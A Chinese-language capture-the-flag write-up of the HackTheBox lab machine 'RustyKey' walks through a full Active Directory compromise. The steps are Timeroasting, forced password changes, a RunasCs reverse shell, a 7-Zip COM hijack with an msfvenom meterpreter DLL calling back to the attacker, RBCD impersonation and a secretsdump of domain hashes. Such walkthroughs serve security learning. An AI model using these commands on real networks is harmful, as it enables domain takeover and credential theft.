跳过正文

HTB-RustyKey

·2039 字·10 分钟
HTB-Machine Hackthebox Windows
HYH
作者
HYH
一名专注于网络安全、渗透测试与 CTF 挑战的技术爱好者,热衷于记录实战经验、分享工具与技术,致力于持续学习与成长。
目录

Box Info
#

OS Difficulty
Windows Hard
As is common in real life Windows pentests, you will start the RustyKey box with credentials for the following account: rr.parker / 8#t5HE8L!W3A

Nmap
#

[root@kali] /home/kali/RustyKey  
❯ nmap rustykey.htb -A      

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-29 13:48:41Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found

GetTGT (rr.parker)
#

默认给出账户无法直接用于认证

[root@kali] /home/kali/RustyKey  
❯ nxc smb 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'SMB         10.10.11.75     445    NONE             [*]  x64 (name:) (domain:) (signing:True) (SMBv1:False)
SMB         10.10.11.75     445    NONE             [-] \rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED 

[root@kali] /home/kali/RustyKey  
❯ nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'
LDAP        10.10.11.75     389    dc.rustykey.htb  [*]  x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.75     389    dc.rustykey.htb  [-] rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED

完善客户端配置

[root@kali] /home/kali  
❯ cat /etc/krb5.conf 
[libdefaults]
    default_realm = RUSTYKEY.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    ticket_lifetime = 24h
    forwardable = true

[realms]
    RUSTYKEY.HTB = {
        kdc = 10.10.11.75
    }

[domain_realm]
    .rustykey.htb = RUSTYKEY.HTB
    rustykey.htb = RUSTYKEY.HTB

请求Kerberos票据来进行认证

[root@kali] /home/kali/RustyKey  
❯ impacket-getTGT rustykey.htb/'rr.parker':'8#t5HE8L!W3A'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in rr.parker.ccache

[root@kali] /home/kali/RustyKey  
export KRB5CCNAME=/home/kali/RustyKey/rr.parker.ccache

[root@kali] /home/kali/RustyKey  
❯ nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k 
LDAP        10.10.11.75     389    dc.rustykey.htb  [*]  x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.75     389    dc.rustykey.htb  [+] rustykey.htb\rr.parker:8#t5HE8L!W3A 

User Enumerate
#

[root@kali] /home/kali/RustyKey  
❯ nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k --users     
LDAP        10.10.11.75     389    dc.rustykey.htb  [*]  x64 (name:dc.rustykey.htb) (domain:rustykey.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.75     389    dc.rustykey.htb  [+] rustykey.htb\rr.parker:8#t5HE8L!W3A 
LDAP        10.10.11.75     389    dc.rustykey.htb  [*] Enumerated 11 domain users: rustykey.htb
LDAP        10.10.11.75     389    dc.rustykey.htb  -Username-                    -Last PW Set-       -BadPW- -Description-                     
LDAP        10.10.11.75     389    dc.rustykey.htb  Administrator                 2025-06-04 22:52:22 3       Built-in account for administering the computer/domain                                                                                                                            
LDAP        10.10.11.75     389    dc.rustykey.htb  Guest                         <never>             0       Built-in account for guest access to the computer/domain                                                                                                                          
LDAP        10.10.11.75     389    dc.rustykey.htb  krbtgt                        2024-12-27 00:53:40 0       Key Distribution Center Service Account                                                                                                                                           
LDAP        10.10.11.75     389    dc.rustykey.htb  rr.parker                     2025-06-04 22:54:15 1                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  mm.turner                     2024-12-27 10:18:39 0                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  bb.morgan                     2025-06-29 14:16:40 0                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  gg.anderson                   2025-06-29 14:16:40 0                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  dd.ali                        2025-06-29 14:16:40 1                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  ee.reed                       2025-06-29 14:16:40 0                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  nn.marcos                     2024-12-27 11:34:50 1                                         
LDAP        10.10.11.75     389    dc.rustykey.htb  backupadmin                   2024-12-30 00:30:18 1                                         

Timeroasting to hash leak
#

使用前提

1. 目标必须是计算机账户,不能直接针对普通用户账户(除非做“目标Timeroasting”修改属性)。
2. 目标域控制器开启并响应带有 Microsoft SNTP 扩展认证(MS-SNTP)的 NTP 服务,UDP 123端口开放。
3. 攻击者能向 DC 发送未认证的 MS-SNTP 请求(无需有效凭证)。
4. 能枚举域内计算机账户的 RID(相对标识符)。
5. (可选)针对“目标Timeroasting”,需要域管理员权限,临时修改用户账户属性使其被当作计算机账户处理。
6. 域中计算机账户密码未被强力保护(例如弱密码或未定期更换)。

可以使用的脚本:SecuraBV/Timeroast: Timeroasting scripts by Tom Tervoort

[root@kali] /home/kali/RustyKey/Timeroast (main) 
❯ python timeroast.py 10.10.11.75                                                                                                             ⏎
1000:$sntp-ms$541e56ee0785292844cd3a4d402b543b$1c0111e900000000000a104f4c4f434cec0d09c525a2d227e1b8428bffbfcd0aec0d1f45ed925501ec0d1f45ed927b98
1103:$sntp-ms$885a139fd759d37417664243783bbd2e$1c0111e900000000000a104f4c4f434cec0d09c5255a3d63e1b8428bffbfcd0aec0d1f4691626479ec0d1f4691627392
1104:$sntp-ms$50db9bcbb01364753a51d9ad87334e7a$1c0111e900000000000a104f4c4f434cec0d09c525d23c78e1b8428bffbfcd0aec0d1f4691da6033ec0d1f4691da77b0
1105:$sntp-ms$b21dd12e2f54ba103173276b52ac5a28$1c0111e900000000000a104f4c4f434cec0d09c525d5ced4e1b8428bffbfcd0aec0d1f4691ddef33ec0d1f4691de085e
1107:$sntp-ms$72c064df6565397579c07a123fa9a581$1c0111e900000000000a10504c4f434cec0d09c523da9288e1b8428bffbfcd0aec0d1f46a3da7b0bec0d1f46a3da9c99
1106:$sntp-ms$523e1fbcb109b13c7c03f77fb94b0abf$1c0111e900000000000a10504c4f434cec0d09c523d78b6ce1b8428bffbfcd0aec0d1f46a3d7617bec0d1f46a3d79c33
1119:$sntp-ms$33ebfc2674e7536ed6d154a740325d72$1c0111e900000000000a10504c4f434cec0d09c52483a464e1b8428bffbfcd0aec0d1f46b87b692cec0d1f46b87b79f3
1120:$sntp-ms$d5261b4a237d17e07add187f73bf05df$1c0111e900000000000a10504c4f434cec0d09c524956dbae1b8428bffbfcd0aec0d1f46b88d2f28ec0d1f46b88d44f7
1121:$sntp-ms$dd30728f5ecc625b7ee31e136619b14f$1c0111e900000000000a10504c4f434cec0d09c524976866e1b8428bffbfcd0aec0d1f46b88f231eec0d1f46b88f42fe
1118:$sntp-ms$2e21c9e9b562fce0810a6758164a4ebd$1c0111e900000000000a10504c4f434cec0d09c524787ce9e1b8428bffbfcd0aec0d1f46b8703298ec0d1f46b8705780
1122:$sntp-ms$5204997edea3423b2673aec76ca560b1$1c0111e900000000000a10504c4f434cec0d09c524a5da19e1b8428bffbfcd0aec0d1f46b89d9323ec0d1f46b89db156
1123:$sntp-ms$06b411c3bf92a0cf9bb14491d1fb7ef0$1c0111e900000000000a10504c4f434cec0d09c524d3f4dfe1b8428bffbfcd0aec0d1f46b8cb8e08ec0d1f46b8cbcf76
1125:$sntp-ms$d7e7fef91094a412a2e8cb82c7716f1a$1c0111e900000000000a10504c4f434cec0d09c52308c3f3e1b8428bffbfcd0aec0d1f46bb191728ec0d1f46bb193052
1124:$sntp-ms$5e8f8d7411278b141ef09ef40a58197f$1c0111e900000000000a10504c4f434cec0d09c523087d7de1b8428bffbfcd0aec0d1f46bb18cba8ec0d1f46bb18ed36
1126:$sntp-ms$31ac85d513769160227bdd504d415377$1c0111e900000000000a10504c4f434cec0d09c523191f8be1b8428bffbfcd0aec0d1f46bb296c0aec0d1f46bb298bea
1127:$sntp-ms$2bb6c5485dbbd37c5cec188a04944677$1c0111e900000000000a10504c4f434cec0d09c523251208e1b8428bffbfcd0aec0d1f46bb356034ec0d1f46bb358014

参考文章:Targeted Timeroasting: Stealing User Hashes With NTP | Medium 使用hashcat进行爆破需要使用Beta版本 成功破解出密码

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$sntp-ms$d7e7fef91094a412a2e8cb82c7716f1a$1c0111e900000000000a10504c4f434cec0d09c52308c3f3e1b8428bffbfcd0aec0d1f46bb191728ec0d1f46bb193052:Rusty88!
Approaching final keyspace - workload adjusted.

Bloodhound
#

[root@kali] /home/kali/RustyKey  
❯ bloodhound-python  -u 'rr.parker' -p '8#t5HE8L!W3A' -k -d rustykey.htb -ns 10.10.11.75 -c ALl --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: rustykey.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc.rustykey.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 16 computers
INFO: Connecting to LDAP server: dc.rustykey.htb
INFO: Found 13 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 10 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: dc.rustykey.htb
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.75:445)] timed out
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.75:445)] timed out
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.75:445)] timed out
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 37S
INFO: Compressing output into 20250701095916_bloodhound.zip

这个密码对应的RID是上面的1125的账户,对应的是IT-CONPUTER3

查看对外权限

AddSelf TO Helpdesk
#

[root@kali] /home/kali/RustyKey  
❯ impacket-getTGT rustykey.htb/'IT-COMPUTER3$':'Rusty88!'Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in IT-COMPUTER3$.ccache

[root@kali] /home/kali/RustyKey  
export KRB5CCNAME=/home/kali/RustyKey/IT-COMPUTER3\$.ccache 


[root@kali] /home/kali/RustyKey  
❯ bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' add groupMember HELPDESK 'IT-COMPUTER3$'[+] IT-COMPUTER3$ added to HELPDESK

Change Password & GetTGT (Failed)
#

[root@kali] /home/kali/RustyKey  
❯ bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password bb.morgan 'Abc123456@'[+] Password changed successfully!

[root@kali] /home/kali/RustyKey  
❯ impacket-getTGT rustykey.htb/'bb.morgan':'Abc123456@'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)

注意到这个PROTECTED OBJECTS组,大概率是因为这个组的限制问题

如果想要获取到bb.morgan的权限,那么首先就要移除保护

Remove IT From Protection
#

[root@kali] /home/kali/RustyKey  
❯ bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove groupMember 'PROTECTED OBJECTS' 'IT'[-] IT removed from PROTECTED OBJECTS

然后修改密码进行登录

[root@kali] /home/kali/RustyKey  
❯ bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password bb.morgan 'Abc123456@'        
[+] Password changed successfully!

[root@kali] /home/kali/RustyKey  
❯ impacket-getTGT rustykey.htb/'bb.morgan':'Abc123456@'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in bb.morgan.ccache

[root@kali] /home/kali/RustyKey  
export KRB5CCNAME=/home/kali/RustyKey/bb.morgan.ccache 

[root@kali] /home/kali/RustyKey  
❯ evil-winrm -i dc.rustykey.htb -u 'bb.morgan' -r rustykey.htb     
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: User is not needed for Kerberos auth. Ticket will be used
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> type ../desktop/user.txt
<hidden>

PDF In DESKTOP
#

*Evil-WinRM* PS C:\Users\bb.morgan\desktop> ls


    Directory: C:\Users\bb.morgan\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/4/2025   9:15 AM           1976 internal.pdf
-ar---         7/1/2025   2:54 AM             34 user.txt


*Evil-WinRM* PS C:\Users\bb.morgan\desktop> download internal.pdf
                                        
Info: Downloading C:\Users\bb.morgan\desktop\internal.pdf to internal.pdf

大致内容如下

- **Support组**被临时授予了**扩展权限**,用于测试和排查共享工作站上的文件归档(压缩/解压)功能。
    
- 目的是解决财务和IT团队报告的与上下文菜单操作相关的问题。
    
- 期间可能会对**注册表进行调整**。
    
- 要求避免做无关系统组件的修改。
    
- 权限变更有日志,会在测试稳定后撤销。
    
- 如果遇到权限错误或缺少右键菜单动作,要反馈给DevOps。

意思是说SUPPORT组对注册表有修改权限,并且可以测试压缩/解压相关功能

注意到EE.REED用户就位于SUPPORT组中,但是也在PROTECTED OBJECT组里

Remove SUPPORT From Protection
#

[root@kali] /home/kali/RustyKey  
export KRB5CCNAME=/home/kali/RustyKey/IT-COMPUTER3\$.ccache

[root@kali] /home/kali/RustyKey  
❯ bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'  
[-] SUPPORT removed from PROTECTED OBJECTS

然后修改密码

[root@kali] /home/kali/RustyKey  
❯ bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password ee.reed 'Abc123456@'                 
[+] Password changed successfully!

但是登录不上去

那么需要换一种方式获取到shell

RunasCs (ee.reed)
#

上传Runascs.exe.

*Evil-WinRM* PS C:\Users\bb.morgan\Documents> upload /home/kali/RustyKey/RunasCs.exe
                                        
Info: Uploading /home/kali/RustyKey/RunasCs.exe to C:\Users\bb.morgan\Documents\RunasCs.exe
                                        
Data: 68948 bytes of 68948 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\Users\bb.morgan\Documents> .\RunasCS.exe ee.reed Abc123456@ powershell.exe -r 10.10.16.47:6666
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-1e124ff$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 6836 created in background.

kali端进行监听,成功接收到

[root@kali] /home/kali/RustyKey  
❯ nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.16.47] from (UNKNOWN) [10.10.11.75] 62377
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
rustykey\ee.reed
PS C:\Windows\system32> 

COM Hijack
#

Windows应用程序经常通过CLSID(Class ID)调用COM组件,系统会根据注册表中的配置加载对应的DLL或EXE。攻击者可以: ​​篡改现有COM组件的注册表项​​,使其指向恶意DLL。在上面的PDF中给出了可能的信息

- **Support组**被临时授予了**扩展权限**,用于测试和排查共享工作站上的文件归档(压缩/解压)功能。
    
- 期间可能会对**注册表进行调整**。

COM Hijack:
- 劫持COM组件的注册表项(CLSID),修改InprocServer32指向恶意DLL/EXE。
- 影响调用该COM组件的所有程序,目标是Windows组件或程序加载COM时被劫持。
- 劫持范围广,可跨进程,且可用来Bypass UAC提权。
- 劫持点在注册表,利用COM对象的加载流程。

由于提及到了注册表和压缩相关,先检测一下可能存在的CLSID

PS C:\tmp> reg query HKCR\CLSID /s /f "zip"
reg query HKCR\CLSID /s /f "zip"

HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}
    (Default)    REG_SZ    7-Zip Shell Extension

HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
    (Default)    REG_SZ    C:\Program Files\7-Zip\7-zip.dll

HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
    (Default)    REG_SZ    Compressed (zipped) Folder SendTo Target
    FriendlyTypeName    REG_EXPAND_SZ    @%SystemRoot%\system32\zipfldr.dll,-10226

HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}\DefaultIcon
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}
    (Default)    REG_SZ    Compressed (zipped) Folder Context Menu

HKEY_CLASSES_ROOT\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{BD472F60-27FA-11cf-B8B4-444553540000}
    (Default)    REG_SZ    Compressed (zipped) Folder Right Drag Handler

HKEY_CLASSES_ROOT\CLSID\{BD472F60-27FA-11cf-B8B4-444553540000}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}\DefaultIcon
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

HKEY_CLASSES_ROOT\CLSID\{ed9d80b9-d157-457b-9192-0e7280313bf0}
    (Default)    REG_SZ    Compressed (zipped) Folder DropHandler

HKEY_CLASSES_ROOT\CLSID\{ed9d80b9-d157-457b-9192-0e7280313bf0}\InProcServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\zipfldr.dll

End of search: 14 match(es) found.

注意到了这个7-Zip,接下来用msfvenom生成恶意dll

[root@kali] /home/kali/RustyKey  
❯  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.47 LPORT=4444 -f dll -o hack.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: hack.dll

上传之后修改注册表

PS C:\tmp>  reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\tmp\hack.dll" /f
 reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\tmp\hack.dll" /f
The operation completed successfully.

设置监听可以得到meterpreter

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.47:4444 
[*] Sending stage (203846 bytes) to 10.10.11.75
[*] Meterpreter session 1 opened (10.10.16.47:4444 -> 10.10.11.75:62445) at 2025-07-01 11:32:19 -0400

meterpreter > getuid
Server username: RUSTYKEY\mm.turner
meterpreter > 
[*] 10.10.11.75 - Meterpreter session 1 closed.  Reason: Died

RBCD
#

  • (RBCD) Resource-based constrained | The Hacker Recipes 查看一下这个mm.turner的权限
  • AddAllowedToAct, a write permission on an object’s msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute, for Kerberos RBCD attacks 攻击者拥有 AddAllowedToAct 权限时,可以给自己或受控账户添加委派权限,从而执行身份冒充攻击(S4U2self/S4U2proxy)。 因此可以在接收到meterpreter的时候给IT-COMPUTER$3设置冒充DC,然后进行RBCD攻击
meterpreter > shell
Process 11164 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>powershell.exe
powershell.exe
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
PS C:\Windows> 

目标是BACKUPADMIN

[root@kali] /home/kali/RustyKey  
export KRB5CCNAME=/home/kali/RustyKey/IT-COMPUTER3\$.ccache 

[root@kali] /home/kali/RustyKey  
❯ impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'rustykey.htb/IT-COMPUTER3$:Rusty88!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating backupadmin
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

[root@kali] /home/kali/RustyKey  
export KRB5CCNAME=/home/kali/RustyKey/backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

现在已经成功通过 Kerberos 委派(S4U) 拿到了 backupadmin 的访问票据,可以理解为“临时借用权限”。然后走wmiexec拿到shell

[root@kali] /home/kali/RustyKey  
❯ impacket-wmiexec -k -no-pass 'rustykey.htb/backupadmin@dc.rustykey.htb'Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
rustykey\backupadmin

C:\>

DCsync
#

可以拿到administrator的哈希

[root@kali] /home/kali/RustyKey  
❯ impacket-secretsdump -k -no-pass 'rustykey.htb/backupadmin@dc.rustykey.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3aac437da6f5ae94b01a6e5347dd920:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
RUSTYKEY\DC$:plain_password_hex:0c7fbe96b20b5afd1da58a1d71a2dbd6ac75b42a93de3c18e4b7d448316ca40c74268fb0d2281f46aef4eba9cd553bbef21896b316407ae45ef212b185b299536547a7bd796da250124a6bb3064ae48ad3a3a74bc5f4d8fbfb77503eea0025b3194af0e290b16c0b52ca4fecbf9cfae6a60b24a4433c16b9b6786a9d212c7aaefefa417fe33cc7f4dcbe354af5ce95f407220bada9b4d841a3aa7c6231de9a9ca46a0621040dc384043e19800093303e1485021289d8719dd426d164e90ee3db3914e3d378cc9e80560f20dcb64b488aa468c1b71c2bac3addb4a4d55231d667ca4ba2ad36640985d9b18128f7755b25
RUSTYKEY\DC$:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
[*] DefaultPassword 
RUSTYKEY\Administrator:Rustyrc4key#!
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3c06efaf194382750e12c00cd141d275522d8397
dpapi_userkey:0xb833c05f4c4824a112f04f2761df11fefc578f5c
[*] NL$KM 
 0000   6A 34 14 2E FC 1A C2 54  64 E3 4C F1 A7 13 5F 34   j4.....Td.L..._4
 0010   79 98 16 81 90 47 A1 F0  8B FC 47 78 8C 7B 76 B6   y....G....Gx.{v.
 0020   C0 E4 94 9D 1E 15 A6 A9  70 2C 13 66 D7 23 A1 0B   ........p,.f.#..
 0030   F1 11 79 34 C1 8F 00 15  7B DF 6F C7 C3 B4 FC FE   ..y4....{.o.....
NL$KM:6a34142efc1ac25464e34cf1a7135f34799816819047a1f08bfc47788c7b76b6c0e4949d1e15a6a9702c1366d723a10bf1117934c18f00157bdf6fc7c3b4fcfe
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<hidden>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f4ad30fa8d8f2cfa198edd4301e5b0f3:::
rustykey.htb\rr.parker:1137:aad3b435b51404eeaad3b435b51404ee:d0c72d839ef72c7d7a2dae53f7948787:::
rustykey.htb\mm.turner:1138:aad3b435b51404eeaad3b435b51404ee:7a35add369462886f2b1f380ccec8bca:::
rustykey.htb\bb.morgan:1139:aad3b435b51404eeaad3b435b51404ee:44c72edbf1d64dc2ec4d6d8bc24160fc:::
rustykey.htb\gg.anderson:1140:aad3b435b51404eeaad3b435b51404ee:93290d859744f8d07db06d5c7d1d4e41:::
rustykey.htb\dd.ali:1143:aad3b435b51404eeaad3b435b51404ee:20e03a55dcf0947c174241c0074e972e:::
rustykey.htb\ee.reed:1145:aad3b435b51404eeaad3b435b51404ee:4dee0d4ff7717c630559e3c3c3025bbf:::
rustykey.htb\nn.marcos:1146:aad3b435b51404eeaad3b435b51404ee:33aa36a7ec02db5f2ec5917ee544c3fa:::
rustykey.htb\backupadmin:3601:aad3b435b51404eeaad3b435b51404ee:34ed39bc39d86932b1576f23e66e3451:::
mark_pentester:12104:aad3b435b51404eeaad3b435b51404ee:b17ebf419e79699e47addeeff82aa886:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
Support-Computer1$:1103:aad3b435b51404eeaad3b435b51404ee:5014a29553f70626eb1d1d3bff3b79e2:::
Support-Computer2$:1104:aad3b435b51404eeaad3b435b51404ee:613ce90991aaeb5187ea198c629bbf32:::

然后还是得请求票据来进行认证

[root@kali] /home/kali/RustyKey  
❯ impacket-getTGT rustykey.htb/'Administrator' -hashes ":<hidden>"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Administrator.ccache

[root@kali] /home/kali/RustyKey  
❯ export KRB5CCNAME=/home/kali/RustyKey/Administrator.ccache                                

[root@kali] /home/kali/RustyKey  
❯ evil-winrm -i dc.rustykey.htb -u 'Administrator' -r rustykey.htb                      
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: User is not needed for Kerberos auth. Ticket will be used
                                        
